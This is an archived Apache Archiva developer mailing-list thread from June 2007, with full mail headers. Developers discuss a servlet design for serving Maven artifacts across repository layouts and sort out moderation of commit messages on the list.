Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 95508 invoked from network); 6 Jun 2007 06:50:33 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 6 Jun 2007 06:50:33 -0000 Received: (qmail 23027 invoked by uid 500); 6 Jun 2007 06:50:36 -0000 Delivered-To: [email protected] Received: (qmail 22998 invoked by uid 500); 6 Jun 2007 06:50:36 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 22989 invoked by uid 99); 6 Jun 2007 06:50:36 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 05 Jun 2007 23:50:36 -0700 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO ug-out-1314.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 05 Jun 2007 23:50:31 -0700 Received: by ug-out-1314.google.com with SMTP id 34so418936ugf for <[email protected]>; Tue, 05 Jun 2007 23:50:10 -0700 (PDT) DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=EyLIbunGiam6zfeqj8mW8b5BjPhDzP/O4iCEQnuXD552xuQ317fEpx7KJ//zpEcncdyokshaWWdlqi1wTyejyGNhqcCBdoQ3Yoon/NoBySQHFJqvctW8xVNJzlsjKIUIaBKMyVLDFbCW0320tE/W2yWTm+6PQ2DHnPsWSaSRyKM= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=Ea+/vZcGkTJQEBx8OPlsuumRX8TwaYzWQJkdhS1oLU2WtpUqM9nUnj7eF22i8P/5nXXGPiOqzpgH93/80BICqZWUjWwrUYeW9DUHss1mz918CZXM9tP3RkdM6lCsty75nQsDD6i/ki38WzRBQxTEP8n3mGnlUoKucNdFRyTKi/g= Received: by 161.129.204.104 with SMTP id e8mr45970hud.1181112610142; Tue, 05 Jun 2007 23:50:10 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Tue, 5 Jun 2007 23:50:10 -0700 (PDT) Message-ID: <[email protected]> Date: Wed, 6 Jun 2007 08:50:10 +0200 From: "nicolas de loof" <[email protected]> To: [email protected] Subject: Re: service layer API proposal In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_30829_22213258.1181112610103" References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org ------=_Part_30829_22213258.1181112610103 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline I agree with Brett about moving the DAV Url to a specific entry, as it requires some specific handlign of GET as Joakim exposed to be compatible with no-so-compliant Dav clients. Based on this, if we access the repository as Dav via /webdav/{repoId}/{path}, and map the /repository/{repoId}/{path} to a new Get servlet, wy couldn't we combine layout detection with specific URLS ? I mean /repository/{repoId}/{path} can detect legacy vs default maven layout easily based on number of "/" in the path. If the apt path (for example) overlaps with another supported layout, we simply need to provide an alternative /apt/{repoId}/{path}. "repository" would then simply be a reserved keyword for "autodetect requested type". 2007/6/5, Joakim Erdfelt <[email protected]>: > > Splitting up this discussion ... > > First is the "detection" of clients. > Archiva has to manage not only the artifact, but also the pom/model > version too. > > Example: > A maven 2 client can request either of these format URLs. > > http://machine.com/repository/internal/commons-lang/poms/commons-lang-2.1.pom > > http://machine.com/repository/internal/commons-lang/commons-lang/2.1/commons-lang-2.1.pom > > On maven 2, these can both be of model version 4.0.0 and it'll work. > On maven 1, these have to be model version 3.0.0 to work. > > Oh if only the client could identify itself, then wouldn't be a problem. > :-) > > The reason for the "/get/{implementation-id}/{layout-path}" is to > clearly identify the intent of the client, and > compensate/migrate/regenerate/translate the requested resource for the > client. It is clear, not overloaded. > > As it stands now, the bidirectional layout has a tough time with maven 1 > layout requests of non-typical artifact types (seen commonly in > corporate environments). The lack of a acf:4db6:5e0b:f386:43a5:35d7:718d:3c8b1 relationship between file > extension and artifact type makes things even more difficult for > "detection". > > In short, I thoroughly dislike the idea of detecting the serving layer > based on path information. > I see it as a band-aide, a short term solution, one that will cause a > mess of spaghetti code in the Repository servlet. > > When we move to other artifact providing concepts, yum/apt/osgi, etc... > there is tremendous overlap on the path structure, so much so that this > detection route is just a dead-end to me. > > - Joakim > > Brett Porter wrote: > > I agree. Any reason we can't use detection? > > > > Also, any reason why the handler for downloading from the /repository/ > > can't be this get servlet instead of dav servlet? We probably don't > > want to add new ways to download from the repository for the same > > reason we removed /proxy/. I realise you can only map one servlet, but > > the servlet could delegate all operations other than get() to the dav > > implementation. > > > > Anyway, not really sure of the implementation, just don't like 'get' > > as a name :) > > > > I also don't agree on the repository storage format. I don't see any > > reason this can't be configurable, and I think it's useful to be able > > to run on an existing repo, or should we ever change the m2 format in > > future. > > > > - Brett > > > > On 06/06/2007, at 4:18 AM, nicolas de loof wrote: > > > >> The "/get/{implementation-id}/{layout-path}" is an interesting option. > >> > >> Where would you place the target managed repository in such an URL ? > >> > >> The only thing I don't like in this solution is that it doesn't work > >> based > >> on an auto-detection of the requested format. I'd prefer the servlet to > >> search for an implementation that accepts the requested path, so that > >> the > >> current "/repository/id/{layout}" would be valid for any supported > >> layout. > >> > >> > >> 2007/6/5, Joakim Erdfelt <[email protected]>: > >>> > >>> We have 2 concepts that are co-mingled right now. > >>> > >>> 1) Getting an artifact from Archiva. > >>> 2) Deploying an artifact to Archiva. > >>> > >>> This proposal should focus on #1, Getting an artifact from Archiva. > >>> (As for #2, that can remain the realm of the current DavServlet > >>> implementation) > >>> > >>> I always pictured this as a new GetArtifactServlet. > >>> > >>> Lets say we have it mapped to the "/get" servlet mapping. > >>> The following urls would all point to the same artifact. > >>> > >>> : Basic Format for maven 1 clients. > >>> > >>> > http://hostname.com/archiva/get/maven1/org.apache.maven.wagon/jars/wagon-scm-1.0-alpha-3.jar > >>> > >>> : Basic Format for maven 2 clients. > >>> > >>> > http://hostname.com/archiva/get/maven2/org/apache/maven/wagon/wagon-scm/1.0-alpha-3/wagon-scm-1.0-alpha-3.jar > >>> > >>> > >>> : (Advanced / Future Use) apt/deb serving. > >>> > >>> > http://hostname.com/archiva/get/apt-deb/org.apache.maven.wagon/wagon-scm-1.0-alpha-3.deb > >>> > >>> : (Advanced / Future Use) yum/rpm serving. > >>> > >>> > http://hostname.com/archiva/get/yum-rpm/org.apache.maven.wagon/wagon-scm-1.0-alpha-3.rpm > >>> > >>> > >>> Using a new servlet, would essentially decouple the filesystem > >>> format/layout as a requirement. > >>> Archiva can assume maven 2 format for the filesystem, and serve the > >>> artifact to the client in the way that is requested. After all the > >>> artifact > >>> information is now in the database. It makes sense to me to do it > >>> this way. > >>> > >>> The idea with the URL format is that > >>> "/get/{implementation-id}/{artifact-reference-implementation-format}" > >>> > >>> The implementation id can be a plexus role-hint on the > >>> implementation of > >>> this GetArtifactServlet. > >>> > >>> What do you think? > >>> > >>> - Joakim > >>> > >>> nicolas de loof wrote: > >>> > >>> Hello, > >>> > >>> To enhance archiva-1.0 support for maven1, I'd like to introduce a > >>> layer > >>> between DavServlet and repository proxies connectors. > >>> As Joakim suggested, this is the scope of the Dynamic Artifact Serving > >>> Layer > >>> in archiva roadmap. > >>> > >>> I propose this API : > >>> > >>> public interface ArtifactServingLayer > >>> { > >>> /** > >>> * Retrieve an artifact path in the repository based on the > resource > >>> string. > >>> */ > >>> public String getResourcePath( String resource ); > >>> } > >>> > >>> The serving layer is responsible of finding the resource in the > managed > >>> repository, with any required logic or temporary content, and to give > a > >>> repository-related path back to the DavServer. > >>> > >>> The default implementation could simply use proxies-connectors to > >>> find the > >>> > >>> resource, and some interceptors / proxies could add features, like > >>> converting on-the-fly from a layout format to the managedRepository > >>> layout, > >>> handle artifact relocation when a non-POM artifact is requested, or > >>> anything > >>> we discover to be usefull. > >>> > >>> What's your opinion ? > >>> > >>> > >>> > > > > > -- > - Joakim Erdfelt > [email protected] > Open Source Software (OSS) Developer > > ------=_Part_30829_22213258.1181112610103-- From [email protected] Wed Jun 06 11:24:27 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 54837 invoked from network); 6 Jun 2007 11:24:25 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 6 Jun 2007 11:24:25 -0000 Received: (qmail 52043 invoked by uid 500); 6 Jun 2007 11:24:29 -0000 Delivered-To: [email protected] Received: (qmail 51990 invoked by uid 500); 6 Jun 2007 11:24:28 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 51975 invoked by uid 99); 6 Jun 2007 11:24:28 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 06 Jun 2007 04:24:28 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: local policy) Received: from [161.129.204.104] (HELO mail.sventech.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 06 Jun 2007 04:24:23 -0700 Received: from mail.sventech.com (localhost.localdomain [161.129.204.104]) by mail.sventech.com (Postfix) with ESMTP id 779364803C for <[email protected]>; Wed, 6 Jun 2007 11:24:02 +0000 (UTC) Received: from [161.129.204.104] (c-71-59-8-58.hsd1.ga.comcast.net [161.129.204.104]) by mail.sventech.com (Postfix) with ESMTP id 3FDBB4801A for <[email protected]>; Wed, 6 Jun 2007 11:24:02 +0000 (UTC) Message-ID: <[email protected]> Date: Wed, 06 Jun 2007 07:30:07 -0400 From: Joakim Erdfelt <[email protected]> User-Agent: Thunderbird 161.129.204.104 (X11/20070501) MIME-Version: 1.0 To: [email protected] Subject: Re: service layer API proposal References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Scanned: ClamAV using ClamSMTP X-Virus-Checked: Checked by ClamAV on apache.org nicolas de loof wrote: > I agree with Brett about moving the DAV Url to a specific entry, as it > requires some specific handlign of GET as Joakim exposed to be compatible > with no-so-compliant Dav clients. > > Based on this, if we access the repository as Dav via > /webdav/{repoId}/{path}, and map the /repository/{repoId}/{path} to a new > Get servlet, wy couldn't we combine layout detection with specific URLS ? > > I mean /repository/{repoId}/{path} can detect legacy vs default maven > layout > easily based on number of "/" in the path. If the apt path (for example) > overlaps with another supported layout, we simply need to provide an > alternative /apt/{repoId}/{path}. "repository" would then simply be a > reserved keyword for "autodetect requested type". One point. The layout is currently determined by the setting specified on the {repoId}, not based on the number of "/" in the path. - Joakim From [email protected] Wed Jun 06 11:40:27 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 79020 invoked from network); 6 Jun 2007 11:40:27 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 6 Jun 2007 11:40:27 -0000 Received: (qmail 77475 invoked by uid 500); 6 Jun 2007 11:40:30 -0000 Delivered-To: [email protected] Received: (qmail 77370 invoked by uid 500); 6 Jun 2007 11:40:30 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 77359 invoked by uid 99); 6 Jun 2007 11:40:30 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 06 Jun 2007 04:40:30 -0700 X-ASF-Spam-Status: No, hits=2.9 required=10.0 tests=HTML_10_20,HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO wr-out-0506.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 06 Jun 2007 04:40:25 -0700 Received: by wr-out-0506.google.com with SMTP id 58so75345wri for <[email protected]>; Wed, 06 Jun 2007 04:40:04 -0700 (PDT) DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=S0dxaAA2wX46G5seUaZXxu6UvJSGV0BhRD1VUpET95UMpeLR+8Ncz/6MqZUP9ZJkYmy45tLYEa74D+F54VMVuXF5NGZbTClrzaMsiTdQNISRouTEPtrt6jMKjZYB+FFqSNT6URractIHTx2kg/Ld93ULU/T7fZshUtMWkBczxnw= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=AXCNpvWW/QPDCzbNfvzOrJBGIbdv/6MhEX8GfotGcLsNdSdfUU1Vk2cq1NidPaGvTWB5v9RJ5/7kT7mdsf9s0NxwZ1TkviS+fNdWj6KS2A0ibDE0ZQ6wIOqdZZI98El/E/2ya5WcKn9NUYUNHZBrHUjHbPO8G3N+jFDtIZAcQAc= Received: by 161.129.204.104 with SMTP id 7mr133891huu.1181130003216; Wed, 06 Jun 2007 04:40:03 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Wed, 6 Jun 2007 04:40:03 -0700 (PDT) Message-ID: <[email protected]> Date: Wed, 6 Jun 2007 13:40:03 +0200 From: "nicolas de loof" <[email protected]> To: [email protected] Subject: Re: service layer API proposal In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_34268_23514361.1181130003180" References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org ------=_Part_34268_23514361.1181130003180 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline You're right, the layout used by the managedRepository to store artifacts is specified in its configuration, and the SVN code requires the request to follow this layout. But the layout used to request an artifact from maven1 or maven2 is simple to detect. The fact that the managedRepository internally use a filesystem layout to store artifact is not visible, as the servlet layer can request for ArtifactReference. Having this abstraction makes easy to convert any incoming request from any supported layout to ArtifactReference, and then from ArtifactReference to a File in managed repo. So the difficulty dor auto-detecting request layout is only in the servlet layer. It can select the valid BidirectionalLayout based on determinist URL mappings "/{layoutId}/{repoId}/{path}" or based on auto-detection "/repository/{repoId}/{path}", as I propose in MRM-412. > I mean /repository/{repoId}/{path} can detect legacy vs default maven > > layout > > easily based on number of "/" in the path. If the apt path (for example) > > overlaps with another supported layout, we simply need to provide an > > alternative /apt/{repoId}/{path}. "repository" would then simply be a > > reserved keyword for "autodetect requested type". > One point. The layout is currently determined by the setting specified > on the {repoId}, not based on the number of "/" in the path. > > - Joakim > ------=_Part_34268_23514361.1181130003180-- From [email protected] Wed Jun 06 16:35:58 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 20718 invoked from network); 6 Jun 2007 16:35:56 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 6 Jun 2007 16:35:56 -0000 Received: (qmail 58426 invoked by uid 500); 6 Jun 2007 16:36:00 -0000 Delivered-To: [email protected] Received: (qmail 58379 invoked by uid 500); 6 Jun 2007 16:35:59 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 58370 invoked by uid 99); 6 Jun 2007 16:35:59 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 06 Jun 2007 09:35:59 -0700 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO ug-out-1314.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 06 Jun 2007 09:35:55 -0700 Received: by ug-out-1314.google.com with SMTP id 34so534947ugf for <[email protected]>; Wed, 06 Jun 2007 09:35:34 -0700 (PDT) DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:sender:to:subject:cc:mime-version:content-type:content-transfer-encoding:content-disposition:x-google-sender-auth; b=LWFOo/uvpCz/8yT6dPEZBeL7f2Vrm9PAzPBvTA7GgrtXDiPpphSzZfjMBg4Id2f2+3wP4aMM/w3VVOlY03L05JsAbQa+7EF9UomaoFrG1H5xlLi2fpcHEYKynkw7ioE/Jb2HWywrTgNbjz0n1fYKLx2iaM8xha01/CZxn6afb2o= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:sender:to:subject:cc:mime-version:content-type:content-transfer-encoding:content-disposition:x-google-sender-auth; b=HGH2uacjTPmPP89i8BtZ7kcemavpiyRt6uBZSNagdk1Qib4EG663cBtfogct2XODF6H8HBRww9WXBj0I/ml692oOuJ6kytnAbh8r9LOUXKp+g3GCVGrja+RHLp6YwrcEEcqGRN71IBf/HwNOTFXa04wSIpV9SLQQuiP8VfCAHr8= Received: by 161.129.204.104 with SMTP id h6mr1361058ugj.1181147733948; Wed, 06 Jun 2007 09:35:33 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Wed, 6 Jun 2007 09:35:33 -0700 (PDT) Message-ID: <[email protected]> Date: Wed, 6 Jun 2007 09:35:33 -0700 From: "Carlos Sanchez" <[email protected]> Sender: [email protected] To: [email protected] Subject: Moderation on commit messages Cc: "Fabrice Bellingard" <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline X-Google-Sender-Auth: aaf47f83029a3d38 X-Virus-Checked: Checked by ClamAV on apache.org Fabrice commits are getting moderated, can I subscribe hime directly or he has to do it himself ? -- I could give you my word as a Spaniard. No good. I've known too many Spaniards. -- The Princess Bride From [email protected] Wed Jun 06 18:18:55 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 90997 invoked from network); 6 Jun 2007 18:18:53 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 6 Jun 2007 18:18:53 -0000 Received: (qmail 19414 invoked by uid 500); 6 Jun 2007 18:18:47 -0000 Delivered-To: [email protected] Received: (qmail 19381 invoked by uid 500); 6 Jun 2007 18:18:47 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Delivered-To: moderator for [email protected] Received: (qmail 18189 invoked by uid 99); 6 Jun 2007 18:17:28 -0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (herse.apache.org: local policy) Message-ID: <[email protected]> Date: Wed, 06 Jun 2007 19:16:45 +0100 From: Max Bowsher <[email protected]> User-Agent: Thunderbird 161.129.204.104 (X11/20070604) MIME-Version: 1.0 To: [email protected] CC: Fabrice Bellingard <[email protected]> Subject: Re: Moderation on commit messages References: <[email protected]> In-Reply-To: <[email protected]> X-Enigmail-Version: 161.129.204.104 OpenPGP: id=C0F2C580 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="------------enigDF1D86CBAB4C58AD7C53453F" X-Virus-Checked: Checked by ClamAV on apache.org --------------enigDF1D86CBAB4C58AD7C53453F Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Carlos Sanchez wrote: > Fabrice commits are getting moderated, can I subscribe hime directly > or he has to do it himself ? Fabrice can do it himself by sending an email from his Apache address, to= : <[email protected]> and responding to the resultant confirmation email. Alternatively, if Fabrice uses his Apache address as a read-only alias, and it isn't convenient for him to send a message from it, he can send to this address instead: <[email protected]= > which will result in a confirmation going to Fabrice as above. Alternatively, if an authorized list administrator uses the address above, the confirmation email will go to that list administrator, who can then acknowledge the confirmation without involving Fabrice. Max. --------------enigDF1D86CBAB4C58AD7C53453F Content-Type: application/pgp-signature; name="signature.asc" Content-Description: OpenPGP digital signature Content-Disposition: attachment; filename="signature.asc" -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFGZvoafFNSmcDyxYARAljxAKCyEmy4J035YgRa1hx6KX4pQcA2OgCfd87m Z/TCtqYaH0suMJDXHyyW4HY= =4eUJ -----END PGP SIGNATURE----- --------------enigDF1D86CBAB4C58AD7C53453F-- From [email protected] Thu Jun 07 00:20:57 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 51584 invoked from network); 7 Jun 2007 00:20:56 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 7 Jun 2007 00:20:56 -0000 Received: (qmail 60765 invoked by uid 500); 7 Jun 2007 00:20:59 -0000 Delivered-To: [email protected] Received: (qmail 60727 invoked by uid 500); 7 Jun 2007 00:20:59 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 60718 invoked by uid 99); 7 Jun 2007 00:20:59 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 06 Jun 2007 17:20:59 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (herse.apache.org: local policy) Received: from [161.129.204.104] (HELO mx05.syd.iprimus.net.au) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 06 Jun 2007 17:20:54 -0700 X-IronPort-Anti-Spam-Filtered: true X-IronPort-Anti-Spam-Result: AgAAAFvrZkbLhk60/2dsb2JhbAAN X-IronPort-AV: E=Sophos;i="4.16,390,1175436000"; d="scan'208";a="49896629" Received: from 180.alb0103.alb.iprimus.net.au (HELO [161.129.204.104]) ([161.129.204.104]) by smtp05.syd.iprimus.net.au with ESMTP; 07 Jun 2007 10:20:32 +1000 Mime-Version: 1.0 (Apple Message framework v752.3) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> Content-Type: text/plain; charset=US-ASCII; delsp=yes; format=flowed Message-Id: <[email protected]> Content-Transfer-Encoding: 7bit From: Brett Porter <[email protected]> Subject: Re: Moderation on commit messages Date: Thu, 7 Jun 2007 10:20:28 +1000 To: [email protected] X-Mailer: Apple Mail (2.752.3) X-Virus-Checked: Checked by ClamAV on apache.org Carlos, You should reply-to-all on the first of these messages normally. The - *allow-tc-* address adds them to the allow list with no extra steps necessary (except to moderate any messages already in the queue). On 07/06/2007, at 4:16 AM, Max Bowsher wrote: > Carlos Sanchez wrote: >> Fabrice commits are getting moderated, can I subscribe hime directly >> or he has to do it himself ? > > Fabrice can do it himself by sending an email from his Apache > address, to: > > <[email protected]> > > and responding to the resultant confirmation email. > > > > Alternatively, if Fabrice uses his Apache address as a read-only > alias, > and it isn't convenient for him to send a message from it, he can send > to this address instead: > > <archiva-commits-allow-subscribe- > [email protected]> > > which will result in a confirmation going to Fabrice as above. > > > > Alternatively, if an authorized list administrator uses the address > above, the confirmation email will go to that list administrator, who > can then acknowledge the confirmation without involving Fabrice. > > > Max. > > From [email protected] Thu Jun 07 08:27:56 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 8075 invoked from network); 7 Jun 2007 08:27:54 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 7 Jun 2007 08:27:54 -0000 Received: (qmail 83598 invoked by uid 500); 7 Jun 2007 08:27:57 -0000 Delivered-To: [email protected] Received: (qmail 83557 invoked by uid 500); 7 Jun 2007 08:27:56 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 83543 invoked by uid 99); 7 Jun 2007 08:27:56 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 07 Jun 2007 01:27:56 -0700 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO an-out-0708.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 07 Jun 2007 01:27:50 -0700 Received: by an-out-0708.google.com with SMTP id d30so100154and for <[email protected]>; Thu, 07 Jun 2007 01:27:30 -0700 (PDT) DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:sender:to:subject:in-reply-to:mime-version:content-type:references:x-google-sender-auth; b=JdPflRpxPMB1zGMagzJc/PBMFC24LUOAuGcuqXwqmS6OaHeAapW/JBNha0Tfsy+/d8hml4T0Mcuud4XVwdCUi/neJoUMWrZDpjSx0h5amREtQFEV91l71oPKlEcJETBFgjOCAwvJQ3t6AdbgbsWn7VF80JXIAUXWzPTQJobUj5c= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:sender:to:subject:in-reply-to:mime-version:content-type:references:x-google-sender-auth; b=EbKCIBEBfO8ni9cpuVMw0i3AyVYP8EHkukR6NG7wTlAkyFunUm1kCbnejgehPNcC5Yzyj+Cpf+zCK0TdHtDhzeUSjHOsVSVJcZt7lueJRKcAvdae1LreM9pp928aW/wjmF/EAQICv/WpdTWhboQDnS+f5n5FDQVYnbcwe9OcumA= Received: by 161.129.204.104 with SMTP id s19mr900690anb.1181204849957; Thu, 07 Jun 2007 01:27:29 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Thu, 7 Jun 2007 01:27:29 -0700 (PDT) Message-ID: <[email protected]> Date: Thu, 7 Jun 2007 10:27:29 +0200 From: "Fabrice Bellingard" <[email protected]> Sender: [email protected] To: [email protected] Subject: Re: Moderation on commit messages In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_49196_5258638.1181204849918" References: <[email protected]> <[email protected]> X-Google-Sender-Auth: 7758a268e5ea9b18 X-Virus-Checked: Checked by ClamAV on apache.org ------=_Part_49196_5258638.1181204849918 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline I got the confirmation mail and answered it, this should be OK now. Thanks! Fabrice. On 6/6/07, Max Bowsher <[email protected]> wrote: > > Carlos Sanchez wrote: > > Fabrice commits are getting moderated, can I subscribe hime directly > > or he has to do it himself ? > > Fabrice can do it himself by sending an email from his Apache address, to: > > <[email protected]> > > and responding to the resultant confirmation email. > > > > Alternatively, if Fabrice uses his Apache address as a read-only alias, > and it isn't convenient for him to send a message from it, he can send > to this address instead: > > <[email protected]> > > which will result in a confirmation going to Fabrice as above. > > > > Alternatively, if an authorized list administrator uses the address > above, the confirmation email will go to that list administrator, who > can then acknowledge the confirmation without involving Fabrice. > > > Max. > > > > ------=_Part_49196_5258638.1181204849918-- From [email protected] Sat Jun 09 16:30:16 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 27006 invoked from network); 9 Jun 2007 16:30:15 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 9 Jun 2007 16:30:15 -0000 Received: (qmail 75699 invoked by uid 500); 9 Jun 2007 16:30:18 -0000 Delivered-To: [email protected] Received: (qmail 75586 invoked by uid 500); 9 Jun 2007 16:30:18 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 75573 invoked by uid 99); 9 Jun 2007 16:30:17 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 09 Jun 2007 09:30:17 -0700 